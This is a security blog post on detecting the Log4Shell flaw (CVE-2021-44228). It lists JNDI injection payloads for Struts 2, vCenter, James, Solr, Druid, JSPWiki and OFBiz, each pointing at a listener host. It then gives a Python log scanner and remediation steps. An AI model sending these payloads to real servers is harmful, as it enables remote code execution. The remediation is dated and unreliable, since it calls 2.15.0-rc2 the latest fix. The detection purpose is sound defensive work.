Detecting CVE-2021-44228 in affected products

Khan security team 2022-01-24 00:30:15

Apache Struts 2

http://127.0.0.1:8080/struts2-showcase/token/transfer4.action -d struts.token.name='${jndi:rmi://127.0.0.1:1099/ylbtsl}'
http://localhost:8080/struts2-showcase/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/

VMware vCenter

"X-Forwarded-For: \${jndi:ldap://10.0.0.3:1270/lol}" "https://10.0.0.4/websso/SAML2/SSO/photon-machine.lan?SAMLRequest="

Apache James

"smtp://localhost" --user "test:test" --mail-from '${jndi:ldap://localhost:1270/a}@gmail.com' --mail-rcpt 'test' --upload-file email.txt

Apache Solr

'http://localhost:8983/solr/admin/cores?action=CREATE&name=$%7Bjndi:ldap://10.0.0.6:1270/abc%7D&wt=json'
solr/admin/info/system?_=${jndi:ldap://192.168.1.1/exp}&wt=json

Apache Druid

'http://localhost:8888/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2flocalhost:1270%2fabc%7d'

Apache JSPWiki

http://localhost:8080/JSPWiki/wiki/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/

Apache OFBiz

"Cookie: OFBiz.Visitor=\${jndi:ldap://localhost:1270/abc}" https://localhost:8443/webtools/control/main
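
For the defending side, the request forms above can be searched for in access and application logs. The following is an added example, not code from the original post: it percent-decodes each line, collapses nested lookups such as ${::-/}, and reports the scheme and endpoint of any JNDI lookup it finds. It also handles ${lower:...} and ${upper:...} nesting, which the list above does not show; the log lines and the names find_jndi and scan are constructed for this illustration.

```python
import re
from urllib.parse import unquote

# ${prefix:key:-default} yields "default" when the key is unset, e.g. ${::-/} -> "/"
DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# ${lower:x} and ${upper:x} yield x (case aside)
CASEFN = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
# A JNDI lookup: captures the scheme and the host[:port] it would contact
JNDI = re.compile(r"\$\{jndi:(\w+):/*([^/}\s${]+)", re.I)

def find_jndi(line, rounds=5):
    """Return sorted (scheme, endpoint) pairs for JNDI lookups in one log line."""
    hits, text = set(), line
    for _ in range(rounds):
        hits.update((s.lower(), e) for s, e in JNDI.findall(text))
        # Undo one layer of percent-encoding, then collapse innermost nested lookups
        new = CASEFN.sub(r"\1", DEFAULT.sub(r"\1", unquote(text)))
        if new == text:
            break
        text = new
    hits.update((s.lower(), e) for s, e in JNDI.findall(text))
    return sorted(hits)

def scan(lines):
    """Map 1-based line numbers to their hits, skipping clean lines."""
    return {n: h for n, l in enumerate(lines, 1) if (h := find_jndi(l))}

# Constructed access-log lines built from the request forms listed above
SAMPLE_LOG = [
    '10.0.0.9 "GET /solr/admin/cores?action=CREATE&name=$%7Bjndi:ldap://10.0.0.6:1270/abc%7D&wt=json" 400',
    '10.0.0.9 "GET /JSPWiki/wiki/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/" 404',
    '10.0.0.9 "GET /druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2flocalhost:1270%2fabc%7d" 404',
    '10.0.0.9 "GET /webtools/control/main" 200 "Cookie: OFBiz.Visitor=${jndi:ldap://localhost:1270/abc}"',
    '10.0.0.9 "POST /struts2-showcase/token/transfer4.action" 200 "struts.token.name=${jndi:rmi://127.0.0.1:1099/ylbtsl}"',
    '10.0.0.9 "GET /struts2-showcase/index.action" 200',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(n, hits)
```

The endpoints it returns are the hosts to look for in outbound connection logs from the same servers.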

Remediation plan:

1. Emergency mitigation measures:
(1) Modify the JVM parameters to include -Dlog4j2.formatMsgNoLookups=true
(2) Set log4j2.formatMsgNoLookups=True in the configuration
(3) Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
2. Upgrade to the latest version:
Obtain the officially fixed release from the vendor:
https://github.com/apache/logging-log4j2
The latest version is 2.15.0-rc2.
3. Do not allow servers that use log4j to make outbound connections, and upgrade the JDK to 11.0.1, 8u191, 7u201, 6u211 or later.
Copyright statement
Author of this article: Khan security team. When reprinting, please include the original link. Thank you.